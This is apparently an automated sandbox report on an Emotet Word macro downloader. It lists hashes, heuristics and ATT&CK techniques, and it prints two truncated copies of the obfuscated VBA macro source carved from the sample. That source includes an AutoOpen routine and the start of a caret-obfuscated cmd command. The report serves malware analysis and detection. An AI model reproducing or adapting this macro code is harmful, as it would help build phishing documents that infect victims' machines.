Emotet Office (OLE) malware analysis — malicious · 4e89607ca5d96f54

MALICIOUS

Office (OLE)

111.0 KB Created: 2018-09-27 16:37:00 Authoring application: Microsoft Office Word First seen: 2019-01-20

MD5: c3f83ab5b2d5018b4031b226e497107f SHA-1: faf3f47804bb12b7977b8991bda77567fe0eecde SHA-256: 4e89607ca5d96f540a3b7f6eef18a7fb0ccf3e6718164cd578e074f176d19f03

202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains VBA macros, including an AutoOpen macro, and a critical heuristic firing for Shell() calls, indicating it is designed to execute arbitrary code. ClamAV detection confirms it as 'Doc.Downloader.Emotet-6826530-0', strongly suggesting Emotet family and a downloader role. The AutoOpen macro likely initiates the execution of the embedded malicious code, which is designed to download and run a second-stage payload.

Heuristics 6

ClamAV: Doc.Downloader.Emotet-6826530-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6826530-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 20267 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	20267 bytes
SHA-256: `74a6c1f41a15dc8175f8af65f184d69a2dd0a246b965041aa6a8209f77059d17`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "oIkdvbi" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim tlYjhm(2) tlYjhm(0) = InStr(WHjwhl + iDFCCZSNcamGvSlJjhRqdT + jtFcrTLr, RjUSfSEL + apwYzNBRMcjYzHAjSuD + JApOBwlS) + Right(TuvhiP + aNQiKifLEblRXOwmzA + JTGLpEa, 413) + InStr(jciba + fVnhqzvzpSidInHOD + bkjHYhuS, GlUiitTp + sOHnqGUqUMmWCzjFRBiL + rmfdunY) + Right(BMdvQR + cJbTOikvkjpONDwUtqw + qJkhZBSn, 180) tlYjhm(1) = Left(CDIdD + wDoGzJAkRzOjfdFzCBtRw + LBZCVQzo, 964) + Right(jJwYZRAq + XZPfXGtAmsaLchwhQujz + vAiccRGl, 933) + InStrRev(JXzKEot + IwUQwEIiwqaaFPXdUmp + jRKwWMGn, lzjNdsM + AwBimEpQPWTjjhZGlR + SsAiY) + Left(kIphOqfi + SWpYlORAdwTGLvjqlr + WfNilUqE, 984) Dim AREYJr(1) AREYJr(0) = InStr(nTlYwQZ + zKhwLwSChYVQizNjSMC + nDHLw, wZQZcDw + GFGJEPkbqzDpvuUKIQnTu + vlSnfCX) + InStrRev(GvPIX + qIKdIiVqilhdTmdUzJj + fziowVMn, wLkWSQQ + wQqMsUkGDTVJzPzhjVVwrsW + mLDiVjO) Dim onEIf(1) onEIf(0) = Left(Iuhmv + LPQXwbmQCKkNuYNjMJRCP + QXasM, 674) + Left(qialqJaY + wuoGjIZPCSuNALPqXqbw + wXnWW, 738) Dim pCiJj(2) pCiJj(0) = InStrRev(uTBHsPY + NvVTPcjCrnGvJPjLwrc + wwLhAm, QbWrIu + WzHrpwKlRrjtkjEWQ + kPnSqUmY) + Right(jwauV + XABwjvXzhlKEvYNrEWj + NjlzPr, 990) pCiJj(1) = Right(czQQC + PKqmBNhzCCjiSVdizKasH + AbZTfV, 244) + InStr(MsrWzGDz + SkrWLumTKoRiEBIfXjU + tviHjtG, SPmIFNY + LLAuJrmFvRpIwdQQfjH + mPpsE) + Left(HiiIwbwl + znLKqKJtbzINHoItw + IAKLiqf, 764) + InStr(ZOmTsBw + iLUzwQEomqrPfLzff + FwSjwfj, MoZPVoCM + lrBonjWohBRZzEfPSfUa + CSBuqIn) Dim npUOPh(1) npUOPh(0) = Right(PnNVZJ + HbaRzTWIUSAkAZjVGNRF + UdjMFM, 46) + InStrRev(OInMpUTa + OimONilQPWqWmCipCHQSkmR + TAmmLJ, iOViUvO + XlAKKihDowQBcwincjiMNWw + whLCzH) Clczzzm (KeyString(uAijdi + YzRCis + 8 + 11 + 48 + wrmkmjSs + juJYzRc) + KRCMDcHP + LAtPvI + KeyString(thLhlI + UOzAz + 9 + 12 + 56 + zuctiiI + tiMkmi) + ErtLrpVua + MQawQ + tqojiqC + FqKEcaHLrna + NIWFsIVa + lZAHwaq) Dim YmoODQ(2) YmoODQ(0) = Left(dwQtOQ + pQXrWnGPpqzaNNVHJZ + owmsiz, 763) + InStrRev(OGIJS + hzhzNZuPUHftJczivjwIHb + jTESqLw, rvFOw + KrHdAlfLkGmjrusOaLB + ukTjzr) + Left(rVwPTpjw + GGFMpSRXWjRQIiQSvOUQI + sKEFMQ, 747) + InStrRev(KOiuASbj + aFpofGfsbmpwZGTFKTi + PaAVS, nTuUIDVZ + kuuJVRQSMIbnuvJFGuNPn + CzTWku) YmoODQ(1) = InStrRev(jjADuI + rQfLjYwZzUWfGKz + zDbNVY, JZiwX + wInqBYwnaNNMsutPDnpR + pMpAS) + InStr(JzjzWJ + iHonILwHjjCHniwiMMfwUC + MXwWl, ZjAdhv + aTiVNRXHYaBKTlPIljS + WmOCIMQn) Dim MZdtmJ(2) MZdtmJ(0) = InStrRev(WTrGD + kHMDqfYKwOwXOnkfBOuqFIf + IZwHtK, adqwo + uXMCujjucudqvKCGB + GDNll) + Left(UdNAI + vdiiYOBwhmkTijMVrRJpI + KZzhdi, 408) MZdtmJ(1) = Left(hTXcCBbE + AqTojfnmQloakbjREE + izcKjSqp, 97) + InStrRev(zjqlS + vRJOstmdZunbukwlUDTNa + RnPNqOP, wkTGj + TQvSiMnEvOhDjhNbzN + jXMlmMR) Dim wwAzf(1) wwAzf(0) = Right(CacIuAib + AmsHZsijuVcaankpbGESRY + cpfpkEq, 222) + InStrRev(MXDRQQUa + CVhGzlFpUbjAIFriXkPIWhM + pnwqw, HHZrwzB + OdXvMhPpDPmZlzvz + llbZwk) + Left(mYiAzI + qzRGiBuKtwzGzDBFswVNoXB + jmQDVvJ, 966) + InStrRev(nkqQi + KHnUhuJftUjdiPdIdtdKp + CAsCfr, NtPKz + YKBpOUFmamujzzPNs + JOcbcVo) Dim Edmhi(2) Edmhi(0) = InStr(ApzKilaV + RnFVIIjwHOOuHnjhhElapic + rBnhbUzA, vUCiDah + pXwJjnzoMQmfvvHhmZInQ + NiViAHwh) + Right(srHtbf + wwQYHbdGzVhjiaVTzMIq + iOiMnK, 889) + Left(SrioX + tHwMqKYZTGMVIRAcNvuM + rjQbAlw, 483) + InStrRev(BtlizD + UEhTZcjQujIzuIlwwYhInbHo + SfJlHsk, KnskwD + TGlzjzJOmwusRjWPXXr + sanGDo) Edmhi(1) = Right(vrnhd + fAXsFnwszYAZnVEMGJMCK + rzAdH, 814) + InStrRev(kXAzzktu + foLRZMcQaZSzEwziOs + lDwMcGcM, uflpaZ + iZcPRZftnuQjPzNbRjWoN + ChiOV) + InStrRev(wNIVW + ZzNoSzfiuPMzElODRW + fRTHjBoU, DsmIzvN + wnzJdDFXHSUBiWzqCduZ + uMwzlSq) + Right(HJfIqDVw + lHBZmawWMtENnrRFlobQ + pCNIm, 633) End Sub Attribute VB_Name = "iRVUSIA" Function ErtLrpVua() ZLtDnZJln = "d /V/C" + """" + "^s^e^t" + " ^x^i^U^5=^ ^ ^ ^ ^ " + "^ ^ ^ ^ ^ ^ ^ ^ ^ ^ " Dim ZoKrV(1) ZoKrV(0) = Right(lvEGjz + SNLPWntHAhNOKQYqQ + iDRRAcNi, 776) + ... (truncated)

SHA-256: 74a6c1f41a15dc8175f8af65f184d69a2dd0a246b965041aa6a8209f77059d17

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "oIkdvbi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim tlYjhm(2)
tlYjhm(0) = InStr(WHjwhl + iDFCCZSNcamGvSlJjhRqdT + jtFcrTLr, RjUSfSEL + apwYzNBRMcjYzHAjSuD + JApOBwlS) + Right(TuvhiP + aNQiKifLEblRXOwmzA + JTGLpEa, 413) + InStr(jciba + fVnhqzvzpSidInHOD + bkjHYhuS, GlUiitTp + sOHnqGUqUMmWCzjFRBiL + rmfdunY) + Right(BMdvQR + cJbTOikvkjpONDwUtqw + qJkhZBSn, 180)
tlYjhm(1) = Left(CDIdD + wDoGzJAkRzOjfdFzCBtRw + LBZCVQzo, 964) + Right(jJwYZRAq + XZPfXGtAmsaLchwhQujz + vAiccRGl, 933) + InStrRev(JXzKEot + IwUQwEIiwqaaFPXdUmp + jRKwWMGn, lzjNdsM + AwBimEpQPWTjjhZGlR + SsAiY) + Left(kIphOqfi + SWpYlORAdwTGLvjqlr + WfNilUqE, 984)
   Dim AREYJr(1)
AREYJr(0) = InStr(nTlYwQZ + zKhwLwSChYVQizNjSMC + nDHLw, wZQZcDw + GFGJEPkbqzDpvuUKIQnTu + vlSnfCX) + InStrRev(GvPIX + qIKdIiVqilhdTmdUzJj + fziowVMn, wLkWSQQ + wQqMsUkGDTVJzPzhjVVwrsW + mLDiVjO)
   Dim onEIf(1)
onEIf(0) = Left(Iuhmv + LPQXwbmQCKkNuYNjMJRCP + QXasM, 674) + Left(qialqJaY + wuoGjIZPCSuNALPqXqbw + wXnWW, 738)
   Dim pCiJj(2)
pCiJj(0) = InStrRev(uTBHsPY + NvVTPcjCrnGvJPjLwrc + wwLhAm, QbWrIu + WzHrpwKlRrjtkjEWQ + kPnSqUmY) + Right(jwauV + XABwjvXzhlKEvYNrEWj + NjlzPr, 990)
pCiJj(1) = Right(czQQC + PKqmBNhzCCjiSVdizKasH + AbZTfV, 244) + InStr(MsrWzGDz + SkrWLumTKoRiEBIfXjU + tviHjtG, SPmIFNY + LLAuJrmFvRpIwdQQfjH + mPpsE) + Left(HiiIwbwl + znLKqKJtbzINHoItw + IAKLiqf, 764) + InStr(ZOmTsBw + iLUzwQEomqrPfLzff + FwSjwfj, MoZPVoCM + lrBonjWohBRZzEfPSfUa + CSBuqIn)
   Dim npUOPh(1)
npUOPh(0) = Right(PnNVZJ + HbaRzTWIUSAkAZjVGNRF + UdjMFM, 46) + InStrRev(OInMpUTa + OimONilQPWqWmCipCHQSkmR + TAmmLJ, iOViUvO + XlAKKihDowQBcwincjiMNWw + whLCzH)
Clczzzm (KeyString(uAijdi + YzRCis + 8 + 11 + 48 + wrmkmjSs + juJYzRc) + KRCMDcHP + LAtPvI + KeyString(thLhlI + UOzAz + 9 + 12 + 56 + zuctiiI + tiMkmi) + ErtLrpVua + MQawQ + tqojiqC + FqKEcaHLrna + NIWFsIVa + lZAHwaq)
   Dim YmoODQ(2)
YmoODQ(0) = Left(dwQtOQ + pQXrWnGPpqzaNNVHJZ + owmsiz, 763) + InStrRev(OGIJS + hzhzNZuPUHftJczivjwIHb + jTESqLw, rvFOw + KrHdAlfLkGmjrusOaLB + ukTjzr) + Left(rVwPTpjw + GGFMpSRXWjRQIiQSvOUQI + sKEFMQ, 747) + InStrRev(KOiuASbj + aFpofGfsbmpwZGTFKTi + PaAVS, nTuUIDVZ + kuuJVRQSMIbnuvJFGuNPn + CzTWku)
YmoODQ(1) = InStrRev(jjADuI + rQfLjYwZzUWfGKz + zDbNVY, JZiwX + wInqBYwnaNNMsutPDnpR + pMpAS) + InStr(JzjzWJ + iHonILwHjjCHniwiMMfwUC + MXwWl, ZjAdhv + aTiVNRXHYaBKTlPIljS + WmOCIMQn)
   Dim MZdtmJ(2)
MZdtmJ(0) = InStrRev(WTrGD + kHMDqfYKwOwXOnkfBOuqFIf + IZwHtK, adqwo + uXMCujjucudqvKCGB + GDNll) + Left(UdNAI + vdiiYOBwhmkTijMVrRJpI + KZzhdi, 408)
MZdtmJ(1) = Left(hTXcCBbE + AqTojfnmQloakbjREE + izcKjSqp, 97) + InStrRev(zjqlS + vRJOstmdZunbukwlUDTNa + RnPNqOP, wkTGj + TQvSiMnEvOhDjhNbzN + jXMlmMR)
   Dim wwAzf(1)
wwAzf(0) = Right(CacIuAib + AmsHZsijuVcaankpbGESRY + cpfpkEq, 222) + InStrRev(MXDRQQUa + CVhGzlFpUbjAIFriXkPIWhM + pnwqw, HHZrwzB + OdXvMhPpDPmZlzvz + llbZwk) + Left(mYiAzI + qzRGiBuKtwzGzDBFswVNoXB + jmQDVvJ, 966) + InStrRev(nkqQi + KHnUhuJftUjdiPdIdtdKp + CAsCfr, NtPKz + YKBpOUFmamujzzPNs + JOcbcVo)
   Dim Edmhi(2)
Edmhi(0) = InStr(ApzKilaV + RnFVIIjwHOOuHnjhhElapic + rBnhbUzA, vUCiDah + pXwJjnzoMQmfvvHhmZInQ + NiViAHwh) + Right(srHtbf + wwQYHbdGzVhjiaVTzMIq + iOiMnK, 889) + Left(SrioX + tHwMqKYZTGMVIRAcNvuM + rjQbAlw, 483) + InStrRev(BtlizD + UEhTZcjQujIzuIlwwYhInbHo + SfJlHsk, KnskwD + TGlzjzJOmwusRjWPXXr + sanGDo)
Edmhi(1) = Right(vrnhd + fAXsFnwszYAZnVEMGJMCK + rzAdH, 814) + InStrRev(kXAzzktu + foLRZMcQaZSzEwziOs + lDwMcGcM, uflpaZ + iZcPRZftnuQjPzNbRjWoN + ChiOV) + InStrRev(wNIVW + ZzNoSzfiuPMzElODRW + fRTHjBoU, DsmIzvN + wnzJdDFXHSUBiWzqCduZ + uMwzlSq) + Right(HJfIqDVw + lHBZmawWMtENnrRFlobQ + pCNIm, 633)
End Sub


Attribute VB_Name = "iRVUSIA"
Function ErtLrpVua()
ZLtDnZJln = "d /V/C" + """" + "^s^e^t" + " ^x^i^U^5=^ ^ ^ ^ ^ " + "^ ^ ^ ^ ^ ^ ^ ^ ^ ^ "
Dim ZoKrV(1)
ZoKrV(0) = Right(lvEGjz + SNLPWntHAhNOKQYqQ + iDRRAcNi, 776) +
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.